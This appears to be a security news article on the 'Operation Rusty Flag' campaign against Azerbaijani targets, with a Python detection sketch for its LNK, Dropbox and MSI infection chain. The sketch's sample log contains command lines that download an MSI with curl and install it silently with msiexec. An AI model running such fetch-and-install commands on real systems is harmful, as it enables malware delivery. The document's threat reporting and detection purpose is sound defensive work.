A new cyberattack targeting Azerbaijani victims has been identified. The attack is known as Operation Rusty Flag and cybersecurity firm Deep Instinct is tracking it. The campaign has not been connected to any known threat actors or groups at this time.
An analysis published last week by security researchers Simon Kenin, Ron Ben Yizhak, and Mark Vaitzman indicated that the operation had at least two initial access vectors. Among the lures were modified versions of documents previously used by Storm-0978, which may have been a deliberate false flag.
An LNK file is used as a launchpad for retrieving a second-stage payload from Dropbox. This payload is an MSI installer that drops an implant written in Rust on the compromised system. The installer also creates an XML file for the execution of the implant and a decoy image file with a watermark representing the Azerbaijan Ministry of Defense.
An alternative infection vector is a Microsoft Office document named "Overview_of_UWCs_UkraineInNATO_campaign.docx," which exploits CVE-2017-11882, a memory corruption vulnerability in Microsoft Office's Equation Editor, to fetch from a Dropbox URL a different MSI file that carries a variant of the Rust backdoor.
It is noteworthy that Overview_of_UWCs_UkraineInNATO_campaign.docx was used in recent cyber attacks targeting Ukraine that exploited a remote code execution flaw (CVE-2023-36884), attacks attributed to Storm-0978 (aka RomCom, Tropical Scorpius, UNC2596, and Void Rabisu).
The researchers concluded that this action appears to be a deliberate false flag attempt to attribute the attack to Storm-0978.
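As an added illustration (not code from Deep Instinct's report), the following Python sketch shows how a defender might hunt for the two initial-access patterns described above in process-creation telemetry: Equation Editor (EQNEDT32.EXE, the process in which CVE-2017-11882 exploit documents execute) spawning a child process, and an LNK-launched shell fetching from Dropbox followed shortly by msiexec.exe on the same host. The log lines are constructed for the example, and the field layout is an assumption rather than any particular EDR's schema.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real campaign data): one process-creation event per line,
# formatted as "ts|host|parent_image|image|command_line". The field layout is an assumption.
SAMPLE_EVENTS = """\
1|ws01|WINWORD.EXE|EQNEDT32.EXE|EQNEDT32.EXE -Embedding
2|ws01|EQNEDT32.EXE|cmd.exe|cmd.exe /c start msiexec.exe /i C:\\Users\\u\\AppData\\Local\\Temp\\x.msi
3|ws02|explorer.exe|cmd.exe|cmd.exe /c curl -o %TEMP%\\p.msi https://www.dropbox.com/s/abc/p.msi?dl=1
4|ws02|cmd.exe|msiexec.exe|msiexec.exe /i C:\\Users\\u\\AppData\\Local\\Temp\\p.msi /qn
5|ws03|explorer.exe|WINWORD.EXE|WINWORD.EXE report.docx
6|ws03|WINWORD.EXE|EQNEDT32.EXE|EQNEDT32.EXE -Embedding
"""

DROPBOX_RE = re.compile(r"https?://(www\.)?(dl\.)?dropbox(usercontent)?\.com/", re.I)
WINDOW = 60  # seconds allowed between the Dropbox fetch and msiexec.exe on the same host

def parse(text):
    """Parse the pipe-delimited sample format into event dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append({"ts": int(ts), "host": host, "parent": parent.lower(),
                       "image": image.lower(), "cmdline": cmdline})
    return events

def detect(events):
    """Return (host, rule, ts) alerts for the two Rusty Flag initial-access patterns."""
    alerts = []
    last_dropbox = defaultdict(lambda: None)  # host -> ts of the most recent Dropbox fetch
    for e in sorted(events, key=lambda e: e["ts"]):
        # Rule 1: Equation Editor has no legitimate reason to spawn children; a child
        # process is the classic sign of a CVE-2017-11882 exploit document executing.
        if e["parent"] == "eqnedt32.exe":
            alerts.append((e["host"], "eqnedt32_child_process", e["ts"]))
        # Rule 2: a command line fetching from Dropbox, then msiexec.exe running shortly
        # afterwards on the same host (the LNK -> Dropbox -> MSI chain).
        if DROPBOX_RE.search(e["cmdline"]):
            last_dropbox[e["host"]] = e["ts"]
        if e["image"] == "msiexec.exe" and last_dropbox[e["host"]] is not None \
                and e["ts"] - last_dropbox[e["host"]] <= WINDOW:
            alerts.append((e["host"], "dropbox_fetch_then_msiexec", e["ts"]))
    return alerts

if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_EVENTS)):
        print(alert)
```

Host ws03 launches Equation Editor without a child process and produces no alert, which is the expected outcome for a benign equation-bearing document.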
One of the Rust backdoors, WinDefenderHealth.exe, has the capability of gathering and sending information from the compromised host to an attacker-controlled server.
Although the precise objectives of this campaign are not known, there is the possibility that it could serve as a red team exercise. The researchers also note that Rust-based malware is becoming increasingly popular among malware authors as the reverse engineering process is more complex, and many security products do not accurately detect it.